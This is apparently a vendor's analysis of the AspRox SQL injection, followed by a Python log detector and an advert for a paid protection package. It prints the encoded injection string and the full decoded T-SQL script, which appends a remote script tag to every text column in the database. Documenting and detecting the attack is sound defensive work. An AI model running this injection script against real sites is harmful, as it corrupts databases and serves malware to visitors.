Binary Encoded SQL Injection Attack
When the AspRox virus/Trojan first appeared, it took the form of a phishing Trojan, but a recent update pushed to infected computers revealed an entirely new make-up for this online malbot. The bot has been transformed into an unusual form of attackware that is rapidly infecting websites and users.
Once it is installed on a user's machine, the Trojan starts sending ASCII-encoded HTTP GET requests to vulnerable websites written in ASP; it uses a backdoor on the user's machine to do this.
These malicious requests contain an ASCII binary-encoded (hex) T-SQL script, similar to that shown below.
(string reduced)
;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C415245204054 20564152434........20VARCHAR(4000));EXEC(@S);--
The script attempts to connect to the website's database, where it creates a table cursor to browse through the table columns. It retrieves all info from specific VARCHAR fields in all tables found, then adds its own value (in this case a reference to a JavaScript file) to the current values and performs an update on the database.
Decoding the injection reveals the hidden T-SQL script (subject to variation):
DECLARE @T VARCHAR(255)   -- current table name
DECLARE @C VARCHAR(255)   -- current column name
DECLARE Table_Cursor CURSOR FOR
SELECT [A].[Name], [B].[Name]
FROM sysobjects AS [A], syscolumns AS [B]
WHERE [A].[ID] = [B].[ID] AND
[A].[XType] = 'U' /* Table (User-Defined) */
AND
([B].[XType] = 99 /* NTEXT */ OR
[B].[XType] = 35 /* TEXT */ OR
[B].[XType] = 231 /* NVARCHAR */ OR
[B].[XType] = 167 /* VARCHAR */)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE (@@FETCH_STATUS = 0)
BEGIN
-- every text column of every user table gets the script tag appended to each row
EXEC('UPDATE [' + @T + '] SET [' + @C + '] =
RTRIM(CONVERT(VARCHAR, [' + @C + '])) +
''<script src="http://aus[removed].%%%/ngg.js"></script>''')
FETCH NEXT FROM Table_Cursor INTO @T, @C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
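An added detection example, not part of the original write-up: it reads request lines from a web server log, decodes the hex literal that the CAST(0x... AS VARCHAR(4000)) wrapper hides from naive filters, and flags requests whose decoded T-SQL touches system catalog tables or issues UPDATEs. The log layout, indicator list and sample payload are constructed assumptions for this example.

```python
import re
from urllib.parse import unquote

# The AspRox request carries a hex literal in CAST(0x... AS [N]VARCHAR(...)) that is
# then run with EXEC(@S); both halves must be present before a request is flagged.
CAST_RE = re.compile(r"CAST\(0x([0-9A-Fa-f]+)\s+AS\s+(N?VARCHAR)", re.IGNORECASE)
EXEC_RE = re.compile(r"EXEC\s*\(\s*@\w+\s*\)", re.IGNORECASE)
# Things the decoded script does that no legitimate query string should (assumed list).
INDICATORS = ("sysobjects", "syscolumns", "CURSOR", "UPDATE", "<script")

def decode_hex_literal(hex_digits, sql_type):
    """Decode the 0x literal the way SQL Server would for the declared type."""
    raw = bytes.fromhex(hex_digits)
    if sql_type.upper() == "NVARCHAR":            # two bytes per character
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("latin-1")                   # one byte per character

def inspect_request(query_string):
    """Return (decoded_script, indicator_hits), or None if no CAST/EXEC injection."""
    text = unquote(query_string)
    m = CAST_RE.search(text)
    if not m or not EXEC_RE.search(text):
        return None
    script = decode_hex_literal(m.group(1), m.group(2))
    hits = [ind for ind in INDICATORS if ind.lower() in script.lower()]
    return script, hits

def scan_log(lines):
    """Return [(client_ip, hits)] for lines whose query string carries the injection."""
    findings = []
    for line in lines:
        parts = line.split()     # assumed (constructed) layout: date ip method uri query
        if len(parts) < 5:
            continue
        result = inspect_request(parts[4])
        if result and result[1]:
            findings.append((parts[1], result[1]))
    return findings

# Constructed sample: a harmless cursor fragment, hex-encoded the same way the real
# payload is, inside a query string that otherwise looks like a product lookup.
SAMPLE_SCRIPT = "DECLARE Table_Cursor CURSOR FOR SELECT a.name FROM sysobjects a WHERE a.xtype='U'"
SAMPLE_HEX = SAMPLE_SCRIPT.encode("latin-1").hex().upper()
SAMPLE_LOG = [
    "2008-05-01 203.0.113.5 GET /products.asp id=12",
    "2008-05-01 198.51.100.7 GET /products.asp id=12;DECLARE%20@S%20VARCHAR(4000);"
    "SET%20@S=CAST(0x" + SAMPLE_HEX + "%20AS%20VARCHAR(4000));EXEC(@S);--",
]
```

Running `scan_log(SAMPLE_LOG)` returns only the second line's client IP, together with the catalog and cursor references found in the decoded script; the NVARCHAR branch covers the UTF-16 variant of the same encoding.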
The result for those sites affected is the inclusion of the malicious JavaScript file in all the fields described; any of that data rendered on a page of the website then causes the file to run on the website user's machine.
When the JavaScript file is run, a tiny iframe is created which then attempts to download malicious software from another host website using up to 9 different browser exploits. Thus the whole cycle starts again, continuing the spread of infection.
It has been noted that this particular Trojan can be quite difficult to protect websites against. We have heard many reports of 'well coded' sites suffering from this Trojan.
Write-up by: Baz {FireStorm}
Website Owners
It is imperative that all querystring and form data is checked vigorously before being executed against the database. All session objects should also be subject to the same checking methods.
Simply checking 'Server Variables' is not acceptable protection; these can be spoofed.
Restricting database rights is important on high-use front-end web applications: only allow what is absolutely essential.
What Can I Do?
We can offer you a specially designed package to protect your website against attacks by this notoriously difficult-to-clean Trojan. Our package can usually be installed onto your website and database very quickly, offering almost instant protection. We can also repair and rebuild your corrupt database, and have you back up and running in no time at all. Contact us now for a highly competitive quote.
Website solutions to the AspRox Trojan start from £49.99
FireFile Website Protection (ASP Version): Download Now
Protect your website against SQL Injection, XSS, and malicious code.